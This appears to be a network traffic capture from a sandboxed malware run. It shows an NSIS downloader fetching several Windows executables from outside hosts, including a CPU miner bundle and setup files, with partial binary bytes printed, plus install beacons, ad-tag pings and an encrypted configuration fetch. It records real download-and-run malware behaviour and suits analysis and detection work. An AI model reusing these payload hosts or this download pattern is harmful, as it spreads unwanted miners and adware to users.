...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /CPUminer/v6/Bundle_CPUminer.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:45:45 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441897175"
Last-Modified: Thu, 10 Sep 2015 14:59:35 GMT
Cache-Control: max-age=56839
Content-Length: 104395
Content-Type: application/octet-stream
X-HW: 1443019545.dop007.fr7.t,1443019545.cds004.fr7.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...^..K.................b...........6............@.....................................................................................8............................................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata... ...p...........................rsrc...8...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....cB..H.P.u..u..u...T.@..B...SV.5.cB..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.[B.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$..(cB...Si.....VW.T.....tO.q.3.;5,cB.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5,cB.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=141783&tag=RE_CLICKMEIN_DCOUNT1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:46:11 GMT
Server: Apache/2.2.22 (Debian) mod_ssl/2.2.22 OpenSSL/1.0.1e mod_wsgi/3.3 Python/2.7.3 mod_perl/2.0.7 Perl/v5.14.2
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Wed, 23 Sep 15 14:46:00 GMT
Set-Cookie: _c4aid=BD011F6301644D63988D3DBE1A85A160; expires=Mon, 21 Mar 16 14:46:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=BD011F6301644D63988D3DBE1A85A160,1443019571.9003; expires=Mon, 21 Mar 16 14:46:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 141783);......0..
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=141783&tag=RE_CLICKMEIN_COUNT1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:46:11 GMT
Server: Apache/2.2.22 (Debian) mod_ssl/2.2.22 OpenSSL/1.0.1e mod_wsgi/3.3 Python/2.7.3 mod_perl/2.0.7 Perl/v5.14.2
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Wed, 23 Sep 15 14:46:00 GMT
Set-Cookie: _c4aid=872AEB8B748F4F8CA76688E733BB1F5D; expires=Mon, 21 Mar 16 14:46:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=872AEB8B748F4F8CA76688E733BB1F5D,1443019571.7951; expires=Mon, 21 Mar 16 14:46:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 141783);......0..
GET /data.gif?app=12345&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=4145 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:46:14 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1443019575.dop008.fr7.t,1443019574.cds054.fr7.c
GIF89a.............,...........D..;..
GET /cmmdWriter.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2fpsq9kg43yka.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 40746
Connection: keep-alive
Date: Fri, 04 Sep 2015 14:41:56 GMT
Last-Modified: Fri, 04 Sep 2015 14:37:33 GMT
ETag: "ceea099a2589b086940ea7e1333a3ad9"
Accept-Ranges: bytes
Server: AmazonS3
Age: 86234
X-Cache: Hit from cloudfront
Via: 1.1 017ee4b2e5ba6b7a7dd1443f39b6e832.cloudfront.net (CloudFront)
X-Amz-Cf-Id: eiIsDtQTXPpytUGV9Gbeqb4MX9c_BgG2DUyHt7WfSoAQGpaBEOsjqg==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z...........0.......p....@..........................................................................s.......................................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata.......@...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[...U.
<<< skipped >>>
GET /69/all/cp/row/setup.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.staticclientstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:45:40 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441951687"
Last-Modified: Fri, 11 Sep 2015 06:08:07 GMT
Cache-Control: max-age=3282
Content-Length: 1998408
Content-Type: application/x-msdownload
X-HW: 1443019541.dop007.fr7.t,1443019540.cds030.fr7.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..S............F.>.%...F.......F...Z.....e...............b.C...o.K.......r.......................:.......v.......?.....Rich............PE..L...&L.U............................./.......0....@..................................x....@................................. I...........A...........v..H............3..8...............................@............0...............................text...T........................... ..`.rdata..j*...0...,..................@..@.data....0...`.......F..............@....rsrc....A.......B...0..............@..@.reloc...............r..............@..B........................................................................................................................................................................................................................................................................................................................U...M.V3.;.tb.A.;.t[.p..q..q..q..P.;.t.....Q0..0....0.p..p..p .p8.p<.@......Hl.HP.HL....................3.^]........^]..........U...M.3.;.t..A.;.t.Q.P(.P,.P0.^...]........]....U...M.W..tt.y...tmSV.u...y.3..........C..0}......t....|....~.^[....._]....G4..t.9w$t.P.A(.I$P...M.....G4....Q._..w$.X...^[_]........_]..........U...E.S3.;........81.......}.8......V.u.;.u.^.C.[]....^.9^ u..F ` @..^(9^$u..F$. @..F(.N Wh....j.P.......;.u._^.....[]....U.R.~.V._4.........t..F(.N$WP......F....._^..[]........[].......
<<< skipped >>>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"5515\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:35 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 23 Sep 2015 14:45:35 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"5516\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:36 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 23 Sep 2015 14:45:36 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..
GET /installers/bi_downloader/1443013514595/setup.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sub.spirlymo.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 430304
Connection: keep-alive
Server: nginx
Date: Wed, 23 Sep 2015 13:05:53 GMT
Last-Modified: Wed, 23 Sep 2015 13:05:16 GMT
ETag: "5602a38c-690e0"
Expires: Wed, 23 Sep 2015 13:15:53 GMT
Cache-Control: max-age=600
Accept-Ranges: bytes
Age: 282
X-Cache: Hit from cloudfront
Via: 1.1 8ba00e7b6e8959a64c4f6f61fd5596de.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Zi57OwMIu_iJVVu-vAuprdYELHZfgUpnayu0EIT5FlS8nde3cVK_Dg==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................0...............................................s..........pD..........`................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc...pD.......F...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /download/dwn/prq4633/este/re/setup_gmsd_re.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.taxideataxus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:45:49 GMT
Server: Apache/2.2.16
Last-Modified: Tue, 22 Sep 2015 13:40:51 GMT
ETag: "4da0223-586200-5205625711ec0"
Accept-Ranges: bytes
Content-Length: 5792256
Keep-Alive: timeout=15, max=200
Connection: Keep-Alive
Content-Type: application/x-msdos-program
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................0........X..........@..............................P.......(............VX.............................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...(...........................@..P.............@......................@..P..................................................................................................................................................................string................<.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)@..InitInstance..L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..ClassNameIs...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..InheritsFrom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*@..FieldAddress...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObject.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=141783&tag=RE_CLICKMEIN_INSTALL_FIN HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:46:11 GMT
Server: Apache/2.2.22 (Debian) mod_ssl/2.2.22 OpenSSL/1.0.1e mod_wsgi/3.3 Python/2.7.3 mod_perl/2.0.7 Perl/v5.14.2
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Wed, 23 Sep 15 14:46:00 GMT
Set-Cookie: _c4aid=FD3E35598995474EA4634722A1BC5061; expires=Mon, 21 Mar 16 14:46:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=FD3E35598995474EA4634722A1BC5061,1443019571.3949; expires=Mon, 21 Mar 16 14:46:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 141783);......0..
GET /cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: prof.eorezo.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:46:02 GMT
Server: Apache/2.2.22
x-eorezo-crc32: -1
x-eorezo-crypted: 1
x-eorezo-length: 357
Set-Cookie: conftime=1443019562; expires=Mon, 17 Jan 16 08:32:00 GMT; domain=eorezo.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1443019562025888; path=/; expires=Fri, 23-Oct-15 14:46:02 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
1ec..Xg8nssf/4H10OdRv/PBlQCyF9RkAzpy/PPG8paJnu rCw3mAaqFpX2 ZKEgbMMA2htCshaMIPoMPkSppoNIfvqD ZyWxTIl1LyUx8yWjlHHNhn1WF5uF0H6qLM uZMwkTiGldZX5iSj uCsroOrbj/qdFgfbU9hmNOF2lZWiRA4D1nmKWD56o30N03aMe cM TaH0Zt8tkkpVIrV86sjShA2ibI4frmimtvqttCmZq2iOlFsKeYNJxrj/jP12cx2lA7NiBrk4PKXXug7tpKb65atNqDRlvUKKAF9c9zPzn4F2eh8GAfVbPOtZhSf/o/50RLSfemcISdhtiO8gTINReeSoYdUAqhmbrscZPjwnJCjKfgrUbQCV1J0DBwv2J mQsGJZQH4xDticU8Aw3zUoh3vFhu1Wg3CUqlkPjaoTHwm7LcFgkhAy A9qiL9G3nGtxC4eGJD3HM29TeMBpi5wjFtJRirkgPWAr1gnD hmf0=..0..
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4958\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:37 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4959\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:37 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4960\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:37 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4961\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:37 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 23 Sep 2015 14:45:37 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=141783&tag=RE_CLICKMEIN_INSTALL_F11 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:46:11 GMT
Server: Apache/2.2.22 (Debian) mod_ssl/2.2.22 OpenSSL/1.0.1e mod_wsgi/3.3 Python/2.7.3 mod_perl/2.0.7 Perl/v5.14.2
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Wed, 23 Sep 15 14:46:00 GMT
Set-Cookie: _c4aid=B33EA587DA534BAFB0C902ADE543C8E6; expires=Mon, 21 Mar 16 14:46:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=B33EA587DA534BAFB0C902ADE543C8E6,1443019571.29034; expires=Mon, 21 Mar 16 14:46:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 141783);......0..
GET /utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=2620 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: n/Kfkmjf32ZWdLZ4/MM4XUOtzQjxFpV7hGLDYZr7BM3MulNZGR8ampYMCsA3o8lz
x-amz-request-id: 4F9549DE2BE8E045
Date: Wed, 23 Sep 2015 14:45:46 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=5571 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: qyx1E0uJv4asMv9hLFtDiRv4YkJjkDQIXnPMKoEoKj5eu09WZNHVFEBRN2OTrcO2
x-amz-request-id: 46E7733F233028AA
Date: Wed, 23 Sep 2015 14:45:46 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=8217 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: MZfRDBA/wVXj9LEy7MHX V1dRto5j0/4nwU2C7MMb aBqQhxPn1Nj6HEWoVXyCyS
x-amz-request-id: AF3701507DB1C8F3
Date: Wed, 23 Sep 2015 14:45:46 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: MZfRDBA/wVXj9LEy7MHX V1dRto5j0/4nwU2C7MMb aBqQhxPn1Nj6HEWoVXyCyS..x-amz-request-id: AF3701507DB1C8F3..Date: Wed, 23 Sep 2015 14:45:46 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=9825 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: MTW0s9YHETThwIW844IRS4M7z1MHqCCfJ2glJguX74kgtc56zIv4xUowrNDJOL4Q
x-amz-request-id: 44183AB9FDCBDDA2
Date: Wed, 23 Sep 2015 14:45:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: MTW0s9YHETThwIW844IRS4M7z1MHqCCfJ2glJguX74kgtc56zIv4xUowrNDJOL4Q..x-amz-request-id: 44183AB9FDCBDDA2..Date: Wed, 23 Sep 2015 14:45:54 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=183 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: IIRnWh7Dvqc/awZa01mott Om4COSxIF0Wqj UZsFB0tpIq 2Oec9HCSKWXft0zI
x-amz-request-id: C66D93E0AF8D390A
Date: Wed, 23 Sep 2015 14:45:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: IIRnWh7Dvqc/awZa01mott Om4COSxIF0Wqj UZsFB0tpIq 2Oec9HCSKWXft0zI..x-amz-request-id: C66D93E0AF8D390A..Date: Wed, 23 Sep 2015 14:45:57 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=4838 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: HKhWKlT 9r9rChlxurngvvrEVpGWlpgjLmQCbM5pd1fe5ESkFqx/6ooisKyVFnxC
x-amz-request-id: 9727C2131F78239F
Date: Wed, 23 Sep 2015 14:46:14 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: HKhWKlT 9r9rChlxurngvvrEVpGWlpgjLmQCbM5pd1fe5ESkFqx/6ooisKyVFnxC..x-amz-request-id: 9727C2131F78239F..Date: Wed, 23 Sep 2015 14:46:14 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=726 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 79p8mVJDPj hjccgd20HesYR0isDL75hdMpJ5XZ4NUM/y7DXEYEfSdMqO2ExWJxj
x-amz-request-id: E131DCC69CFCE49C
Date: Wed, 23 Sep 2015 14:46:15 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
